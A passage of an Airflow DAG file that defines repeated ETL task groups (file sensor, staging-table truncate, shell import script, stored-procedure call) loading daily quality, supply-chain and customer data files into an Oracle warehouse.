UQ_QualityReturnQty_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_QualityReturnQty"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_QualityReturnQty_LD"
ODS_UQ_QualityReturnQty_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_QualityReturnQty"
)
# JOB_TYPE=SQL
my_taskid = "UQ_QualityReturnQty"
UQ_QualityReturnQty = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_JQMList_WH"
ODS_UQ_JQMList_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_JQMList_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_JQMList_STG"
UQ_JQMList_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_JQMList"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_JQMList_LD"
ODS_UQ_JQMList_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_JQMList"
)
# JOB_TYPE=SQL
my_taskid = "UQ_JQMList"
UQ_JQMList = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_S1_WH"
ODS_UQ_IQC_DailyManpower_S1_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_S1_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_S1_STG"
UQ_IQC_DailyManpower_S1_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_S1"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_S1_LD"
ODS_UQ_IQC_DailyManpower_S1_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_S1"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_S1"
UQ_IQC_DailyManpower_S1 = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_NQJ_WH"
ODS_UQ_IQC_DailyManpower_NQJ_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_NQJ_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_NQJ_STG"
UQ_IQC_DailyManpower_NQJ_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_NQJ"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_NQJ_LD"
ODS_UQ_IQC_DailyManpower_NQJ_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_NQJ"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_NQJ"
UQ_IQC_DailyManpower_NQJ = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_NYC_WH"
ODS_UQ_IQC_DailyManpower_NYC_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_NYC_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_NYC_STG"
UQ_IQC_DailyManpower_NYC_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_NYC"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_NYC_LD"
ODS_UQ_IQC_DailyManpower_NYC_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_NYC"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_NYC"
UQ_IQC_DailyManpower_NYC = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_NQX_WH"
ODS_UQ_IQC_DailyManpower_NQX_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_NQX_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_NQX_STG"
UQ_IQC_DailyManpower_NQX_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_NQX"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_NQX_LD"
ODS_UQ_IQC_DailyManpower_NQX_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_NQX"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_NQX"
UQ_IQC_DailyManpower_NQX = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_NVN_WH"
ODS_UQ_IQC_DailyManpower_NVN_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_NVN_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_NVN_STG"
UQ_IQC_DailyManpower_NVN_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_NVN"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_NVN_LD"
ODS_UQ_IQC_DailyManpower_NVN_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_NVN"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_NVN"
UQ_IQC_DailyManpower_NVN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_S2_WH"
ODS_UQ_IQC_DailyManpower_S2_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_S2_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_S2_STG"
UQ_IQC_DailyManpower_S2_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_S2"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_S2_LD"
ODS_UQ_IQC_DailyManpower_S2_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_S2"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_S2"
UQ_IQC_DailyManpower_S2 = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_InventoryOwnerList_WH"
ODS_UQ_InventoryOwnerList_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_InventoryOwnerList_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_InventoryOwnerList_STG"
UQ_InventoryOwnerList_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_InventoryOwnerList"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_InventoryOwnerList_LD"
ODS_UQ_InventoryOwnerList_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_InventoryOwnerList"
)
# JOB_TYPE=SQL
my_taskid = "UQ_InventoryOwnerList"
UQ_InventoryOwnerList = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_MoPartType_WH"
ODS_UQ_MoPartType_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_MoPartType_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_MoPartType_STG"
UQ_MoPartType_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_MoPartType"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_MoPartType_LD"
ODS_UQ_MoPartType_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_MoPartType"
)
# JOB_TYPE=SQL
my_taskid = "UQ_MoPartType"
UQ_MoPartType = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_Escape_WH"
ODS_UQ_Escape_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_Escape_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_Escape_STG"
UQ_Escape_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_Escape"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_Escape_LD"
ODS_UQ_Escape_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_Escape"
)
# JOB_TYPE=SQL
my_taskid = "UQ_Escape"
UQ_Escape = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_reason_code_WH"
ODS_US_reason_code_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_reason_code_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_reason_code_STG"
US_reason_code_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_reason_code"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_reason_code_LD"
ODS_US_reason_code_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_reason_code"
)
# JOB_TYPE=SQL
my_taskid = "US_reason_code"
US_reason_code = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_scrap_reason_code_WH"
ODS_US_scrap_reason_code_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_scrap_reason_code_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_scrap_reason_code_STG"
US_scrap_reason_code_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_scrap_reason_code"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_scrap_reason_code_LD"
ODS_US_scrap_reason_code_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_scrap_reason_code"
)
# JOB_TYPE=SQL
my_taskid = "US_scrap_reason_code"
US_scrap_reason_code = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_BOM_PRODUCT_LIST_WH"
ODS_US_BOM_PRODUCT_LIST_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_BOM_PRODUCT_LIST_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_BOM_PRODUCT_LIST_STG"
US_BOM_PRODUCT_LIST_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_BOM_PRODUCT_LIST"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_BOM_PRODUCT_LIST_LD"
ODS_US_BOM_PRODUCT_LIST_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_BOM_PRODUCT_LIST"
)
# JOB_TYPE=SQL
my_taskid = "US_BOM_PRODUCT_LIST"
US_BOM_PRODUCT_LIST = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_POTransfer_WH"
ODS_US_POTransfer_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_POTransfer_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_POTransfer_STG"
US_POTransfer_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_POTransfer"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_POTransfer_LD"
ODS_US_POTransfer_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_POTransfer"
)
# JOB_TYPE=SQL
my_taskid = "US_POTransfer"
US_POTransfer = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_ExcessonHandTransfer_WH"
ODS_US_ExcessonHandTransfer_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_ExcessonHandTransfer_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_ExcessonHandTransfer_STG"
US_ExcessonHandTransfer_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_ExcessonHandTransfer"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_ExcessonHandTransfer_LD"
ODS_US_ExcessonHandTransfer_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_ExcessonHandTransfer"
)
# JOB_TYPE=SQL
my_taskid = "US_ExcessonHandTransfer"
US_ExcessonHandTransfer = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_FaultInjectionRecord_WH"
ODS_UQ_FaultInjectionRecord_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=W_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_FaultInjectionRecord_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_FaultInjectionRecord_STG"
UQ_FaultInjectionRecord_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_FaultInjectionRecord"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_FaultInjectionRecord_LD"
ODS_UQ_FaultInjectionRecord_LD = BashOperator(
task_id=my_taskid,
dag=W_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_FaultInjectionRecord"
)
# JOB_TYPE=SQL
my_taskid = "UQ_FaultInjectionRecord"
UQ_FaultInjectionRecord = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_QSCANTrackingRecord_WH"
ODS_UQ_QSCANTrackingRecord_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=W_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_QSCANTrackingRecord_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_QSCANTrackingRecord_STG"
UQ_QSCANTrackingRecord_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_QSCANTrackingRecord"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_QSCANTrackingRecord_LD"
ODS_UQ_QSCANTrackingRecord_LD = BashOperator(
task_id=my_taskid,
dag=W_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_QSCANTrackingRecord"
)
# JOB_TYPE=SQL
my_taskid = "UQ_QSCANTrackingRecord"
UQ_QSCANTrackingRecord = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_ModelMPInfo_WH"
ODS_UQ_ModelMPInfo_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=W_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_ModelMPInfo_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_ModelMPInfo_STG"
UQ_ModelMPInfo_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_ModelMPInfo"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_ModelMPInfo_LD"
ODS_UQ_ModelMPInfo_LD = BashOperator(
task_id=my_taskid,
dag=W_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_ModelMPInfo"
)
# JOB_TYPE=SQL
my_taskid = "UQ_ModelMPInfo"
UQ_ModelMPInfo = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Customer_Grouping_Map_WH"
ODS_UC_Customer_Grouping_Map_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Customer_Grouping_Map_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Customer_Grouping_Map_STG"
UC_Customer_Grouping_Map_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Customer_Grouping_Map"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Customer_Grouping_Map_LD"
ODS_UC_Customer_Grouping_Map_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Customer_Grouping_Map"
)
# JOB_TYPE=SQL
my_taskid = "UC_Customer_Grouping_Map"
UC_Customer_Grouping_Map = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Group_Customer_Location_WH"
ODS_UC_Group_Customer_Location_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Group_Customer_Location_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Group_Customer_Location_STG"
UC_Group_Customer_Location_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Group_Customer_Location"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Group_Customer_Location_LD"
ODS_UC_Group_Customer_Location_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Group_Customer_Location"
)
# JOB_TYPE=SQL
my_taskid = "UC_Group_Customer_Location"
UC_Group_Customer_Location = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Project_Decision_Customer_WH"
ODS_UC_Project_Decision_Customer_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Project_Decision_Customer_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Project_Decision_Customer_STG"
UC_Project_Decision_Customer_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Project_Decision_Customer"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Project_Decision_Customer_LD"
ODS_UC_Project_Decision_Customer_LD = BashOperator(
task_id=my_taskid,
